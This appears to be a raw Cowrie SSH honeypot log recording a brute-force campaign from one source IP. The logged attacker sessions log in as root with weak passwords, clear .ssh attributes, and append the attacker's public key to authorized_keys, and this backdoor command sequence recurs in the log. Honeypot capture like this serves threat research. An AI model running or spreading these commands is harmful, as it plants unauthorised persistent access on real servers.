{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:41:21.439593Z","src_ip":"212.227.235.229","session":"25ef01c5bcb6"}
{"eventid":"cowrie.login.failed","username":"www","password":"root","message":"login attempt [www/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:41:21.771084Z","src_ip":"212.227.235.229","session":"25ef01c5bcb6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:22.845679Z","src_ip":"212.227.235.229","session":"25ef01c5bcb6"}
{"eventid":"cowrie.session.closed","duration":30.379358291625977,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:41.984918Z","src_ip":"14.43.153.110","session":"293bf8bc1aca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51402,"dst_ip":"1.2.3.4","dst_port":22,"session":"99855e2e3b0f","protocol":"ssh","message":"New connection: 212.227.235.229:51402 (1.2.3.4:22) [session: 99855e2e3b0f]","sensor":"my-vps","timestamp":"2025-08-26T04:42:02.789295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:02.790308Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:03.057087Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.login.success","username":"root","password":"pass1234","message":"login attempt [root/pass1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:42:04.127101Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:42:04.682904Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:42:04.683616Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:42:04.684534Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:04.953188Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:42:05.617541Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:42:05.618273Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:42:05.888393Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:05.889353Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:06.077744Z","src_ip":"212.227.235.229","session":"72b0228ed5c1"}
{"eventid":"cowrie.session.closed","duration":"58.1","message":"Connection lost after 58.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:06.079775Z","src_ip":"212.227.235.229","session":"72b0228ed5c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36314,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b8a963a5a14","protocol":"ssh","message":"New connection: 212.227.235.229:36314 (1.2.3.4:22) [session: 3b8a963a5a14]","sensor":"my-vps","timestamp":"2025-08-26T04:42:06.157831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:06.159208Z","src_ip":"212.227.235.229","session":"3b8a963a5a14"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:06.428569Z","src_ip":"212.227.235.229","session":"3b8a963a5a14"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:42:07.548922Z","src_ip":"212.227.235.229","session":"3b8a963a5a14"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:08.821733Z","src_ip":"212.227.235.229","session":"3b8a963a5a14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36320,"dst_ip":"1.2.3.4","dst_port":22,"session":"54a38a17bd2d","protocol":"ssh","message":"New connection: 212.227.235.229:36320 (1.2.3.4:22) [session: 54a38a17bd2d]","sensor":"my-vps","timestamp":"2025-08-26T04:42:09.090564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:09.091455Z","src_ip":"212.227.235.229","session":"54a38a17bd2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:09.360466Z","src_ip":"212.227.235.229","session":"54a38a17bd2d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:42:10.479877Z","src_ip":"212.227.235.229","session":"54a38a17bd2d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:10.752829Z","src_ip":"212.227.235.229","session":"54a38a17bd2d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:10.753793Z","src_ip":"212.227.235.229","session":"99855e2e3b0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36384,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e29597cdd25","protocol":"ssh","message":"New connection: 212.227.235.229:36384 (1.2.3.4:22) [session: 6e29597cdd25]","sensor":"my-vps","timestamp":"2025-08-26T04:42:18.541710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:18.542815Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:18.613947Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.login.success","username":"root","password":"abc","message":"login attempt [root/abc] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:42:18.939470Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:42:19.109982Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.110708Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.111919Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.184503Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:42:19.451451Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.452194Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.525414Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.526269Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36398,"dst_ip":"1.2.3.4","dst_port":22,"session":"c033a33b58f3","protocol":"ssh","message":"New connection: 212.227.235.229:36398 (1.2.3.4:22) [session: c033a33b58f3]","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.600752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.601379Z","src_ip":"212.227.235.229","session":"c033a33b58f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:19.676924Z","src_ip":"212.227.235.229","session":"c033a33b58f3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:42:20.019785Z","src_ip":"212.227.235.229","session":"c033a33b58f3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.097908Z","src_ip":"212.227.235.229","session":"c033a33b58f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36406,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5c02e39b867","protocol":"ssh","message":"New connection: 212.227.235.229:36406 (1.2.3.4:22) [session: e5c02e39b867]","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.169152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.170171Z","src_ip":"212.227.235.229","session":"e5c02e39b867"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 